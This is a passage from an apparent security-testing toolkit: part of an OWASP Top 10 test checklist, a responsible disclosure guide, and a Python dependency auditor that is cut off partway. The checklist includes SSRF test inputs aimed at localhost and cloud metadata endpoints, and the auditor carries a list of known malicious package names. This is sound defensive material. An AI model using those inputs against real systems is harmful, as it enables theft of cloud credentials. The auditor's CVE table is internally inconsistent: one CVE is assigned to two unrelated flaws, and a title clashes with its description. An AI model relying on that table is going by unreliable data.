| 3 | Security headers | Check response headers | CSP, X-Frame-Options, XCTO, HSTS present |
| 4 | HTTP methods | Send OPTIONS request | Only required methods allowed |
| 5 | Directory listing | Request directory without index | Listing disabled (403 or redirect) |
| 6 | Server version disclosure | Check Server and X-Powered-By headers | Version info removed |
| 7 | Error messages | Submit invalid data | Generic error messages, no internal details |
### Remediation
1. Disable debug mode in production
2. Remove default credentials and accounts
3. Add all security headers (CSP, HSTS, X-Frame-Options, XCTO, Referrer-Policy)
4. Remove Server and X-Powered-By headers
5. Disable directory listing
6. Implement generic error pages
### CVSS Scoring Guidance
- **Debug mode in production:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- **Default admin credentials:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing security headers:** CVSS 4.3 — AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
---
## A06:2021 — Vulnerable and Outdated Components
**CWEs Covered:** CWE-1035, CWE-1104
### Description
Components (libraries, frameworks, software modules) with known vulnerabilities that can undermine application defenses.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | npm audit | `npm audit --json` | No critical or high vulnerabilities |
| 2 | pip audit | `pip audit --desc` | No known CVEs |
| 3 | Go vulncheck | `govulncheck ./...` | No reachable vulnerabilities |
| 4 | EOL check | Compare framework versions to vendor EOL dates | No EOL components |
| 5 | License audit | Check dependency licenses | No copyleft licenses in proprietary code |
### Remediation
1. Run dependency audits in CI/CD (block merges on critical/high)
2. Set up automated dependency update PRs (Dependabot, Renovate)
3. Pin dependency versions in lock files
4. Remove unused dependencies
5. Subscribe to security advisories for key dependencies
### CVSS Scoring Guidance
Inherit the CVSS score from the upstream CVE. Add environmental metrics based on reachability.
---
## A07:2021 — Identification and Authentication Failures
**CWEs Covered:** CWE-255, CWE-259, CWE-287, CWE-288, CWE-384, CWE-798
### Description
Weaknesses in authentication mechanisms that allow attackers to compromise passwords, keys, session tokens, or exploit implementation flaws to assume other users' identities.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Brute force | 100 rapid login attempts | Account lockout or exponential backoff |
| 2 | Session cookie flags | Inspect cookies in browser | HttpOnly, Secure, SameSite set |
| 3 | Session invalidation | Logout, replay session cookie | 401 Unauthorized |
| 4 | Username enumeration | Submit valid/invalid usernames | Identical error messages |
| 5 | Password policy | Submit "12345" as password | Rejected (min 8 chars, complexity) |
| 6 | Password reset token | Request reset, check token expiry | Token expires in 15-60 minutes |
| 7 | MFA bypass | Skip MFA step via direct API call | Requires MFA completion |
### Remediation
1. Implement multi-factor authentication
2. Set session cookies with HttpOnly, Secure, SameSite=Strict
3. Invalidate sessions on logout and password change
4. Use generic error messages ("Invalid credentials" not "User not found")
5. Enforce strong password policy (NIST SP 800-63B)
6. Expire password reset tokens within 15-60 minutes
### CVSS Scoring Guidance
- **Authentication bypass:** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Session fixation:** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Username enumeration:** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
---
## A08:2021 — Software and Data Integrity Failures
**CWEs Covered:** CWE-345, CWE-353, CWE-426, CWE-494, CWE-502, CWE-565, CWE-829
### Description
Code and infrastructure that does not protect against integrity violations, including unsafe deserialization, unsigned updates, and CI/CD pipeline manipulation.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Unsafe deserialization | Send crafted serialized objects | Rejected or safely handled |
| 2 | SRI on CDN resources | Check script/link tags | Integrity attribute present |
| 3 | CI/CD pipeline | Review pipeline config | Signed commits, protected branches |
| 4 | Update integrity | Check update mechanism | Signed artifacts, hash verification |
### Remediation
1. Use `yaml.safe_load()` instead of `yaml.load()`
2. Avoid `pickle.loads()` on untrusted data
3. Add SRI hashes to all CDN-loaded scripts
4. Sign all deployment artifacts
5. Protect CI/CD pipeline with branch protection and signed commits
### CVSS Scoring Guidance
- **Unsafe deserialization (RCE):** CVSS 9.8 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Missing SRI on CDN scripts:** CVSS 6.1 — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
---
## A09:2021 — Security Logging and Monitoring Failures
**CWEs Covered:** CWE-117, CWE-223, CWE-532, CWE-778
### Description
Without sufficient logging and monitoring, breaches cannot be detected. Logging too little means missed attacks; logging too much (sensitive data) creates new risks.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Auth event logging | Attempt valid/invalid logins | Both logged with timestamp and IP |
| 2 | Sensitive data in logs | Review log output | No passwords, tokens, PII, credit cards |
| 3 | Alert thresholds | Trigger 50 failed logins | Alert generated |
| 4 | Log integrity | Check log storage | Append-only or integrity-protected storage |
| 5 | Admin action audit trail | Perform admin actions | All actions logged with user identity |
### Remediation
1. Log all authentication events (success and failure)
2. Sanitize logs — strip passwords, tokens, PII before writing
3. Set up alerting on anomalous patterns (SIEM integration)
4. Use append-only log storage (CloudWatch, Splunk, immutable S3)
5. Maintain audit trail for all admin and data-modifying actions
### CVSS Scoring Guidance
Logging failures are typically scored as contributing factors rather than standalone vulnerabilities. When combined with other findings, they increase the overall risk level.
---
## A10:2021 — Server-Side Request Forgery (SSRF)
**CWEs Covered:** CWE-918
### Description
SSRF occurs when a web application fetches a remote resource without validating the user-supplied URL, allowing attackers to reach internal services, cloud metadata endpoints, or other protected resources.
### Test Procedures
| # | Test | Method | Expected Result |
|---|------|--------|-----------------|
| 1 | Internal IP access | Submit `http://127.0.0.1` in URL fields | Request blocked |
| 2 | Cloud metadata | Submit `http://169.254.169.254/latest/meta-data/` | Request blocked |
| 3 | IPv6 localhost | Submit `http://[::1]` | Request blocked |
| 4 | DNS rebinding | Use DNS rebinding service | Request blocked after resolution |
| 5 | URL encoding bypass | Submit `http://0x7f000001` (hex localhost) | Request blocked |
| 6 | Open redirect chain | Find open redirect, chain to internal URL | Request blocked |
### Code Patterns to Detect
```python
# BAD: User-controlled URL without validation
url = request.args.get("url")
response = requests.get(url) # SSRF!
# GOOD: URL allowlist validation
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}
parsed = urlparse(url)
if parsed.hostname not in ALLOWED_HOSTS:
abort(403, "URL not in allowlist")
response = requests.get(url)
```
### Remediation
1. Validate and allowlist outbound URLs (domain, scheme, port)
2. Block requests to private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x)
3. Block requests to cloud metadata endpoints
4. Use a dedicated egress proxy for outbound requests
5. Disable unnecessary URL-fetching features
6. Resolve DNS and validate the IP address before making the request
### CVSS Scoring Guidance
- **SSRF to cloud metadata (credential theft):** CVSS 9.1 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
- **SSRF to internal service (read):** CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Blind SSRF (no response data):** CVSS 5.3 — AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
FILE:references/responsible_disclosure.md
# Responsible Disclosure Guide
A complete guide for responsibly reporting security vulnerabilities found during authorized testing or independent security research.
---
## Disclosure Timeline Templates
### Standard 90-Day Disclosure
The industry-standard timeline used by Google Project Zero, CERT/CC, and most security researchers.
| Day | Action | Owner |
|-----|--------|-------|
| 0 | Discover vulnerability, document with evidence | Researcher |
| 1 | Submit initial report to vendor security contact | Researcher |
| 3 | Confirm report received (if no auto-acknowledgment) | Researcher |
| 7 | Follow up if no acknowledgment received | Researcher |
| 7 | Acknowledge receipt, assign tracking ID | Vendor |
| 14 | Provide initial severity assessment and timeline | Vendor |
| 30 | First status update on remediation progress | Vendor |
| 30 | Request update if none provided | Researcher |
| 60 | Second status update; fix should be in development | Vendor |
| 60 | Offer technical assistance if fix is delayed | Researcher |
| 90 | Public disclosure deadline (with or without fix) | Researcher |
| 90+ | Coordinate joint disclosure statement if fix is ready | Both |
### Accelerated 30-Day Disclosure
For actively exploited vulnerabilities or critical severity (CVSS 9.0+):
| Day | Action |
|-----|--------|
| 0 | Discover, document, report immediately |
| 1 | Vendor acknowledges |
| 7 | Vendor provides remediation timeline |
| 14 | Status update; patch expected |
| 30 | Public disclosure |
### Extended 120-Day Disclosure
For complex vulnerabilities requiring architectural changes:
| Day | Action |
|-----|--------|
| 0 | Report submitted |
| 14 | Vendor acknowledges, confirms complexity |
| 30 | Vendor provides detailed remediation plan |
| 60 | Status update, partial fix may be deployed |
| 90 | Near-complete remediation expected |
| 120 | Full disclosure |
**When to extend:** Only if the vendor is actively working on a fix and communicating progress. A vendor that goes silent does not earn extra time.
---
## Communication Templates
### Initial Vulnerability Report
```
Subject: Security Vulnerability Report — [Brief Title]
To: security@[vendor].com
Dear Security Team,
I am writing to report a security vulnerability I discovered in [Product/Service Name].
## Summary
- **Vulnerability Type:** [e.g., SQL Injection, SSRF, Authentication Bypass]
- **Severity:** [Critical/High/Medium/Low] (CVSS: X.X)
- **Affected Component:** [e.g., /api/login endpoint, User Profile page]
- **Discovery Date:** [YYYY-MM-DD]
## Description
[Clear, technical description of the vulnerability — what it is, where it exists, and why it matters.]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step 3]
## Evidence
[Screenshots, request/response pairs, or proof-of-concept code. Non-destructive only.]
## Impact
[What an attacker could achieve by exploiting this vulnerability.]
## Suggested Remediation
[Your recommendation for fixing the issue.]
## Disclosure Timeline
I follow a [90-day] responsible disclosure policy. I plan to publicly disclose this finding on [DATE] unless we agree on an alternative timeline.
## Researcher Information
- Name: [Your Name]
- Organization: [Your Organization, if applicable]
- Contact: [Your Email]
- PGP Key: [Fingerprint or link to public key]
I have not accessed any user data, modified any systems, or shared this information with anyone else. I am happy to provide additional details or assist with remediation.
Best regards,
[Your Name]
```
### Follow-Up (No Response After 7 Days)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (Follow-Up)
Dear Security Team,
I am following up on the security vulnerability report I submitted on [DATE] regarding [Brief Title].
I have not yet received an acknowledgment. Could you please confirm receipt and provide an estimated timeline for review?
For reference, my original report is included below / attached.
I remain available to provide additional details or clarification.
Best regards,
[Your Name]
```
### Status Update Request (Day 30)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (30-Day Update Request)
Dear Security Team,
It has been 30 days since I reported the [vulnerability type] in [component]. I would appreciate an update on:
1. Has the vulnerability been confirmed?
2. What is the remediation timeline?
3. Is there anything I can do to assist?
As noted in my original report, I follow a 90-day disclosure policy. The current disclosure date is [DATE].
Best regards,
[Your Name]
```
### Pre-Disclosure Notification (Day 80)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (Pre-Disclosure Notice)
Dear Security Team,
This is a courtesy notice that the 90-day disclosure window for [vulnerability] will close on [DATE].
Current status as I understand it: [summarize last known status].
If a fix is not yet available, I recommend:
- Publishing a security advisory acknowledging the issue
- Providing mitigation guidance to affected users
- Communicating a realistic remediation timeline
I am willing to:
- Extend the deadline by [X] days if you can provide a concrete remediation date
- Review the patch before public release
- Coordinate joint disclosure
Please respond by [DATE - 5 days] so we can align on the disclosure approach.
Best regards,
[Your Name]
```
### Public Disclosure Statement
```
# Security Advisory: [Title]
**Reported:** [Date]
**Disclosed:** [Date]
**Vendor:** [Vendor Name]
**Status:** [Fixed in version X.Y.Z / Unpatched / Mitigated]
## Summary
[Brief description accessible to non-technical readers.]
## Technical Details
[Full technical description, reproduction steps, evidence.]
## Impact
[What could be exploited and the blast radius.]
## Timeline
| Date | Event |
|------|-------|
| [Date] | Vulnerability discovered |
| [Date] | Report submitted to vendor |
| [Date] | Vendor acknowledged |
| [Date] | Fix released (version X.Y.Z) |
| [Date] | Public disclosure |
## Remediation
[Steps users should take — update to version X, apply config change, etc.]
## Credit
Discovered by [Your Name] ([Organization]).
```
---
## Legal Considerations
### Before You Test
1. **Written authorization is required.** For external testing, obtain a signed rules-of-engagement document or scope-of-work. For bug bounty programs, the program's terms of service serve as authorization.
2. **Understand local laws.** The Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and equivalent laws in other jurisdictions criminalize unauthorized access. Authorization is your legal shield.
3. **Stay within scope.** If the bug bounty program says "*.example.com only," do not test anything outside that scope. If your pen test contract covers the web application, do not pivot to internal networks.
4. **Document everything.** Keep timestamped records of all testing activities: what you tested, when, what you found, and what you did not do (e.g., "did not access real user data").
### During Testing
1. **Do not access real user data.** Use your own test accounts. If you accidentally access real data, stop immediately, document the incident, and report it to the vendor.
2. **Do not cause damage.** No data destruction, no denial-of-service, no resource exhaustion. If a test might cause disruption, get explicit approval first.
3. **Do not exfiltrate data.** Demonstrate the vulnerability with minimal proof. A screenshot showing "1000 records returned" is sufficient — downloading the records is not.
4. **Do not install backdoors.** Even for "maintaining access during testing." If you need persistent access, work with the vendor's team.
### During Disclosure
1. **Do not threaten.** Disclosure timelines are industry practice, not ultimatums. Communicate professionally.
2. **Do not sell vulnerability details.** Selling to exploit brokers instead of reporting to the vendor is irresponsible and may be illegal.
3. **Give vendors reasonable time.** 90 days is standard. Complex architectural fixes may need more time if the vendor is communicating and making progress.
4. **Do not publicly disclose details that help attackers exploit unpatched systems.** If the fix is not yet deployed, disclose the existence and severity of the issue without full exploitation details.
---
## Bug Bounty Program Integration
### Finding the Right Program
1. **Check the vendor's website:** Look for `/security`, `/.well-known/security.txt`, or a security page
2. **Bug bounty platforms:** HackerOne, Bugcrowd, Intigriti, YesWeHack
3. **No program?** Report to `security@[vendor].com` or use CERT/CC as an intermediary
### Bug Bounty Best Practices
1. **Read the entire policy** before testing — scope, exclusions, safe harbor
2. **Test only in-scope assets** — out-of-scope findings may not be rewarded and could be legally risky
3. **Report one vulnerability per submission** — do not bundle unrelated issues
4. **Provide clear reproduction steps** — assume the reader cannot read your mind
5. **Do not duplicate** — search existing reports before submitting
6. **Be patient** — triage can take days to weeks depending on program volume
7. **Do not publicly disclose** until the program explicitly permits it
### If No Bug Bounty Exists
1. Report directly to `security@[vendor].com`
2. If no response after 14 days, try CERT/CC (https://www.kb.cert.org/vuls/report/)
3. Follow the standard disclosure timeline
4. Do not expect payment — responsible disclosure is an ethical practice, not a paid service
---
## CVE Request Process
### When to Request a CVE
- The vulnerability affects publicly available software
- The vendor has confirmed the issue
- A fix is available or will be available soon
### How to Request
1. **Through the vendor:** If the vendor is a CNA (CVE Numbering Authority), they will assign the CVE
2. **Through MITRE:** If the vendor is not a CNA, submit a request at https://cveform.mitre.org/
3. **Through a CNA:** Some platforms (HackerOne, GitHub) are CNAs and can assign CVEs for vulnerabilities in their scope
### Information Required
```
- Vulnerability type (CWE ID if known)
- Affected product and version range
- Fixed version (if available)
- Attack vector (network, local, physical)
- Impact (confidentiality, integrity, availability)
- CVSS score and vector string
- Description (one paragraph, technical but readable)
- References (advisory URL, patch commit, bug report)
```
### CVE ID Format
```
CVE-YYYY-NNNNN
Example: CVE-2024-12345
```
After assignment, the CVE will be published in the NVD (National Vulnerability Database) at https://nvd.nist.gov/.
---
## Key Principles Summary
1. **Report first, disclose later.** Always give the vendor a chance to fix the issue before going public.
2. **Minimize impact.** Prove the vulnerability exists without causing damage or accessing real data.
3. **Communicate professionally.** Security is stressful for everyone. Be clear, helpful, and patient.
4. **Document everything.** Timestamps, evidence, communications — protect yourself and the process.
5. **Follow through.** A report without follow-up helps no one. Stay engaged until the issue is resolved.
6. **Credit where due.** Acknowledge the vendor's response (positive or negative) in your disclosure.
7. **Know the law.** Authorization and scope are your legal foundations. Never test without them.
FILE:scripts/dependency_auditor.py
#!/usr/bin/env python3
"""
Dependency Auditor - Analyze package manifests for known vulnerable patterns.
Table of Contents:
DependencyAuditor - Main class for dependency vulnerability analysis
__init__ - Initialize with manifest path and severity filter
audit() - Run full audit on the manifest
_parse_manifest() - Detect and parse the manifest file
_parse_package_json() - Parse npm package.json
_parse_requirements() - Parse pip requirements.txt
_parse_go_mod() - Parse Go go.mod
_parse_gemfile() - Parse Ruby Gemfile
_check_vulnerabilities() - Check packages against known CVE patterns
_check_risky_patterns() - Detect risky dependency patterns
main() - CLI entry point
Usage:
python dependency_auditor.py --file package.json
python dependency_auditor.py --file requirements.txt --severity high
python dependency_auditor.py --file go.mod --json
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional, Tuple
@dataclass
class Dependency:
"""Represents a parsed dependency."""
name: str
version: str
ecosystem: str # npm, pypi, go, rubygems
is_dev: bool = False
@dataclass
class VulnerabilityFinding:
"""A known vulnerability match for a dependency."""
package: str
installed_version: str
vulnerable_range: str
cve_id: str
severity: str # critical, high, medium, low
title: str
description: str
remediation: str
cvss_score: float = 0.0
references: List[str] = field(default_factory=list)
@dataclass
class RiskyPattern:
"""A risky dependency pattern (not a CVE, but a concern)."""
package: str
pattern_type: str # pinning, wildcard, deprecated, typosquat
severity: str
description: str
recommendation: str
class DependencyAuditor:
"""Analyze package manifests for known vulnerable patterns and risky dependencies."""
# Known vulnerable package versions (curated subset of high-profile CVEs)
KNOWN_VULNS = [
{"ecosystem": "npm", "package": "lodash", "below": "4.17.21",
"cve": "CVE-2021-23337", "severity": "high", "cvss": 7.2,
"title": "Prototype Pollution in lodash",
"description": "lodash before 4.17.21 is vulnerable to Command Injection via template function.",
"remediation": "Upgrade lodash to >=4.17.21"},
{"ecosystem": "npm", "package": "axios", "below": "1.6.0",
"cve": "CVE-2023-45857", "severity": "medium", "cvss": 6.5,
"title": "CSRF token exposure in axios",
"description": "axios before 1.6.0 inadvertently exposes CSRF tokens in cross-site requests.",
"remediation": "Upgrade axios to >=1.6.0"},
{"ecosystem": "npm", "package": "express", "below": "4.19.2",
"cve": "CVE-2024-29041", "severity": "medium", "cvss": 6.1,
"title": "Open Redirect in express",
"description": "express before 4.19.2 allows open redirects via malicious URLs.",
"remediation": "Upgrade express to >=4.19.2"},
{"ecosystem": "npm", "package": "jsonwebtoken", "below": "9.0.0",
"cve": "CVE-2022-23529", "severity": "critical", "cvss": 9.8,
"title": "Insecure key retrieval in jsonwebtoken",
"description": "jsonwebtoken before 9.0.0 allows key confusion attacks via secretOrPublicKey.",
"remediation": "Upgrade jsonwebtoken to >=9.0.0"},
{"ecosystem": "npm", "package": "minimatch", "below": "3.0.5",
"cve": "CVE-2022-3517", "severity": "high", "cvss": 7.5,
"title": "ReDoS in minimatch",
"description": "minimatch before 3.0.5 is vulnerable to Regular Expression Denial of Service.",
"remediation": "Upgrade minimatch to >=3.0.5"},
{"ecosystem": "npm", "package": "tar", "below": "6.1.9",
"cve": "CVE-2021-37713", "severity": "high", "cvss": 8.6,
"title": "Arbitrary File Creation in tar",
"description": "tar before 6.1.9 allows arbitrary file creation/overwrite via symlinks.",
"remediation": "Upgrade tar to >=6.1.9"},
{"ecosystem": "pypi", "package": "pillow", "below": "9.3.0",
"cve": "CVE-2022-45198", "severity": "high", "cvss": 7.5,
"title": "DoS via crafted image in Pillow",
"description": "Pillow before 9.3.0 allows denial of service via specially crafted image files.",
"remediation": "Upgrade Pillow to >=9.3.0"},
{"ecosystem": "pypi", "package": "django", "below": "4.2.8",
"cve": "CVE-2023-46695", "severity": "high", "cvss": 7.5,
"title": "DoS via file uploads in Django",
"description": "Django before 4.2.8 allows denial of service via large file uploads.",
"remediation": "Upgrade Django to >=4.2.8"},
{"ecosystem": "pypi", "package": "flask", "below": "2.3.2",
"cve": "CVE-2023-30861", "severity": "high", "cvss": 7.5,
"title": "Session cookie exposure in Flask",
"description": "Flask before 2.3.2 may expose session cookies on cross-origin redirects.",
"remediation": "Upgrade Flask to >=2.3.2"},
{"ecosystem": "pypi", "package": "requests", "below": "2.31.0",
"cve": "CVE-2023-32681", "severity": "medium", "cvss": 6.1,
"title": "Proxy-Authorization header leak in requests",
"description": "requests before 2.31.0 leaks Proxy-Authorization headers on redirects.",
"remediation": "Upgrade requests to >=2.31.0"},
{"ecosystem": "pypi", "package": "cryptography", "below": "41.0.0",
"cve": "CVE-2023-38325", "severity": "high", "cvss": 7.5,
"title": "NULL dereference in cryptography",
"description": "cryptography before 41.0.0 has a NULL pointer dereference in PKCS7 parsing.",
"remediation": "Upgrade cryptography to >=41.0.0"},
{"ecosystem": "pypi", "package": "pyyaml", "below": "6.0.1",
"cve": "CVE-2020-14343", "severity": "critical", "cvss": 9.8,
"title": "Arbitrary code execution in PyYAML",
"description": "PyYAML before 6.0.1 allows arbitrary code execution via yaml.load().",
"remediation": "Upgrade PyYAML to >=6.0.1 and use yaml.safe_load()"},
{"ecosystem": "go", "package": "golang.org/x/crypto", "below": "0.17.0",
"cve": "CVE-2023-48795", "severity": "medium", "cvss": 5.9,
"title": "Terrapin SSH prefix truncation attack",
"description": "golang.org/x/crypto before 0.17.0 vulnerable to SSH prefix truncation.",
"remediation": "Upgrade golang.org/x/crypto to >=0.17.0"},
{"ecosystem": "go", "package": "golang.org/x/net", "below": "0.17.0",
"cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
"title": "HTTP/2 rapid reset DoS",
"description": "golang.org/x/net before 0.17.0 vulnerable to HTTP/2 rapid reset attack.",
"remediation": "Upgrade golang.org/x/net to >=0.17.0"},
{"ecosystem": "rubygems", "package": "rails", "below": "7.0.8",
"cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
"title": "ReDoS in Rails",
"description": "Rails before 7.0.8 vulnerable to Regular Expression Denial of Service.",
"remediation": "Upgrade rails to >=7.0.8"},
]
# Known typosquat / malicious package names
TYPOSQUAT_PACKAGES = {
"npm": ["crossenv", "event-stream-malicious", "flatmap-stream", "ua-parser-jss",
"loadsh", "lodashs", "axois", "requets"],
"pypi": ["python3-dateutil", "jeIlyfish", "python-binance-sdk", "requestss",
"djago", "flassk", "requets"],
}
def __init__(self, manifest_path: str, severity_filter: str = "low"):
self.manifest_path = Path(manifest_path)
self.severity_filter = severity_filter
self.severity_order = {"critical": 4, "high": 3, "medium": 2, "low": 1}
self.min_severity = self.severity_order.get(severity_filter, 1)
def audit(self) -> Dict:
"""Run full audit on the manifest file."""
deps = self._parse_manifest()
vuln_findings = self._check_vulnerabilities(deps)
risky_patterns = self._check_risky_patterns(deps)
# Filter by severity
vuln_findings = [f for f in vuln_findings
if self.severity_order.get(f.severity, 0) >= self.min_severity]
risky_patterns = [r for r in risky_patterns
if self.severity_order.get(r.severity, 0) >= self.min_severity]
return {
"manifest": str(self.manifest_path),
"ecosystem": deps[0].ecosystem if deps else "unknown",
"total_dependencies": len(deps),
"dev_dependencies": len([d for d in deps if d.is_dev]),
"vulnerability_findings": vuln_findings,
"risky_patterns": risky_patterns,
"summary": {
"critical": len([f for f in vuln_findings if f.severity == "critical"]),
"high": len([f for f in vuln_findings if f.severity == "high"]),
"medium": len([f for f in vuln_findings if f.severity == "medium"]),
"low": len([f for f in vuln_findings if f.severity == "low"]),
"risky_patterns_count": len(risky_patterns),
}
}
def _parse_manifest(self) -> List[Dependency]:
"""Detect manifest type and parse dependencies."""
name = self.manifest_path.name.lower()
try:
content = self.manifest_path.read_text(encoding="utf-8")
except (OSError, PermissionError) as e:
print(f"Error reading {self.manifest_path}: {e}", file=sys.stderr)
sys.exit(1)
if name == "package.json":
return self._parse_package_json(content)
elif name in ("requirements.txt", "requirements-dev.txt", "requirements_dev.txt"):
return self._parse_requirements(content)
elif name == "go.mod":
return self._parse_go_mod(content)
elif name in ("gemfile", "gemfile.lock"):
return self._parse_gemfile(content)
else:
print(f"Unsupported manifest type: {name}", file=sys.stderr)
print("Supported: package.json, requirements.txt, go.mod, Gemfile", file=sys.stderr)
sys.exit(1)
def _parse_package_json(self, content: str) -> List[Dependency]:
"""Parse npm package.json."""
deps = []
try:
data = json.loads(content)
except json.JSONDecodeError as e:
print(f"Invalid JSON in package.json: {e}", file=sys.stderr)
sys.exit(1)
for name, version in data.get("dependencies", {}).items():
clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=False))
for name, version in data.get("devDependencies", {}).items():
clean_ver = re.sub(r"[^0-9.]", "", version).strip(".")
deps.append(Dependency(name=name, version=clean_ver or version, ecosystem="npm", is_dev=True))
return deps
def _parse_requirements(self, content: str) -> List[Dependency]:
"""Parse pip requirements.txt."""
deps = []
for line in content.strip().split("\n"):
line = line.strip()
if not line or line.startswith("#") or line.startswith("-"):
continue
match = re.match(r"^([a-zA-Z0-9_.-]+)\s*(?:[=<>!~]+\s*)?([\d.]*)", line)
if match:
name, version = match.group(1), match.group(2) or "unknown"
deps.append(Dependency(name=name.lower(), version=version, ecosystem="pypi"))
return deps
def _parse_go_mod(self, content: str) -> List[Dependency]:
"""Parse Go go.mod."""
deps = []
in_require = False
for line in content.strip().split("\n"):
line = line.strip()
if line.startswith("require ("):
in_require = True
continue
if line == ")":
in_require = False
continue
if in_require or line.startswith("require "):
cleaned = line.replace("require ", "").strip()
parts = cleaned.split()
if len(parts) >= 2:
name = parts[0]
version = parts[1].lstrip("v")
indirect = "// indirect" in line
deps.append(Dependency(name=name, version=version, ecosystem="go", is_dev=indirect))
return deps
def _parse_gemfile(self, content: str) -> List[Dependency]:
"""Parse Ruby Gemfile."""
deps = []
for line in content.strip().split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
match = re.match(r'''gem\s+['"]([\w-]+)['"](?:\s*,\s*['"]([^'"]*)['"'])?''', line)
if match:
name = match.group(1)
version = match.group(2) or "unknown"
version = re.sub(r"[~><=\s]", "", version)
deps.append(Dependency(name=name, version=version, ecosystem="rubygems"))
return deps
@staticmethod
def _version_below(installed: str, threshold: str) -> bool:
"""Check if installed version is below threshold (simple numeric comparison)."""
try:
inst_parts = [int(x) for x in installed.split(".") if x.isdigit()]
thresh_parts = [int(x) for x in threshold.split(".") if x.isdigit()]
# Pad shorter list
max_len = max(len(inst_parts), len(thresh_parts))
inst_parts.extend([0] * (max_len - len(inst_parts)))
thresh_parts.extend([0] * (max_len - len(thresh_parts)))
return inst_parts < thresh_parts
except (ValueError, IndexError):
return False
def _check_vulnerabilities(self, deps: List[Dependency]) -> List[VulnerabilityFinding]:
"""Check dependencies against known CVE database."""
findings = []
for dep in deps:
for vuln in self.KNOWN_VULNS:
if (dep.ecosystem == vuln["ecosystem"] and
dep.name.lower() == vuln["package"].lower() and
self._version_below(dep.version, vuln["below"])):
findings.append(VulnerabilityFinding(
package=dep.name,
installed_version=dep.version,
vulnerable_range=f"< {vuln['below']}",
cve_id=vuln["cve"],
severity=vuln["severity"],
title=vuln["title"],
description=vuln["description"],
remediation=vuln["remediation"],
cvss_score=vuln.get("cvss", 0.0),
references=[f"https://nvd.nist.gov/vuln/detail/{vuln['cve']}"],
))
return findings
def _check_risky_patterns(self, deps: List[Dependency]) -> List[RiskyPattern]:
"""Detect risky dependency patterns."""
patterns = []
ecosystem = deps[0].ecosystem if deps else "unknown"
# Check for typosquat packages
typosquats = self.TYPOSQUAT_PACKAGES.get(ecosystem, [])
for dep in deps:
if dep.name.lower() in [t.lower() for t in typosquats]:
patterns.append(RiskyPattern(
package=dep.name,
pattern_type="typosquat",
severity="critical",
description=f"'{dep.name}' is a known typosquat or malicious package name.",
recommendation="Remove immediately and check for compromised data. Install the legitimate package.",
))
# Check for wildcard/unpinned versions
for dep in deps:
if dep.version in ("*", "latest", "unknown", ""):
patterns.append(RiskyPattern(
package=dep.name,
pattern_type="unpinned",
severity="medium",
description=f"'{dep.name}' has an unpinned version ({dep.version}).",
recommendation="Pin to a specific version to prevent supply chain attacks.",
))
# Check for excessive dev dependencies in production
dev_count = len([d for d in deps if d.is_dev])
total = len(deps)
if total > 0 and dev_count / total > 0.7:
patterns.append(RiskyPattern(
package="(project-level)",
pattern_type="dev-heavy",
severity="low",
description=f"{dev_count}/{total} dependencies are dev-only. Large dev surface increases supply chain risk.",
recommendation="Review dev dependencies. Remove unused ones. Consider using --production for installs.",
))
return patterns
def format_report_text(result: Dict) -> str:
"""Format audit result as human-readable text."""
lines = []
lines.append("=" * 70)
lines.append("DEPENDENCY VULNERABILITY AUDIT REPORT")
lines.append(f"Manifest: {result['manifest']}")
lines.append(f"Ecosystem: {result['ecosystem']}")
lines.append(f"Total dependencies: {result['total_dependencies']} ({result['dev_dependencies']} dev)")
lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
lines.append("=" * 70)
summary = result["summary"]
lines.append(f"\nSummary: {summary['critical']} critical, {summary['high']} high, "
f"{summary['medium']} medium, {summary['low']} low, "
f"{summary['risky_patterns_count']} risky pattern(s)")
vulns = result["vulnerability_findings"]
if vulns:
lines.append(f"\n--- VULNERABILITY FINDINGS ({len(vulns)}) ---\n")
for v in vulns:
lines.append(f" [{v.severity.upper()}] {v.package} {v.installed_version}")
lines.append(f" CVE: {v.cve_id} (CVSS: {v.cvss_score})")
lines.append(f" {v.title}")
lines.append(f" Vulnerable: {v.vulnerable_range}")
lines.append(f" Fix: {v.remediation}")
lines.append("")
else:
lines.append("\nNo known vulnerabilities found in dependencies.")
risky = result["risky_patterns"]
if risky:
lines.append(f"\n--- RISKY PATTERNS ({len(risky)}) ---\n")
for r in risky:
lines.append(f" [{r.severity.upper()}] {r.package} — {r.pattern_type}")
lines.append(f" {r.description}")
lines.append(f" Fix: {r.recommendation}")
lines.append("")
return "\n".join(lines)
def main():
parser = argparse.ArgumentParser(
description="Dependency Auditor — Analyze package manifests for known vulnerabilities and risky patterns.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Supported manifests:
package.json (npm)
